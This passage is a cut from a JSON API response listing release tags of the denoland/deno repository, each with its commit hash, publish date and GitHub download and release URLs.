https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositori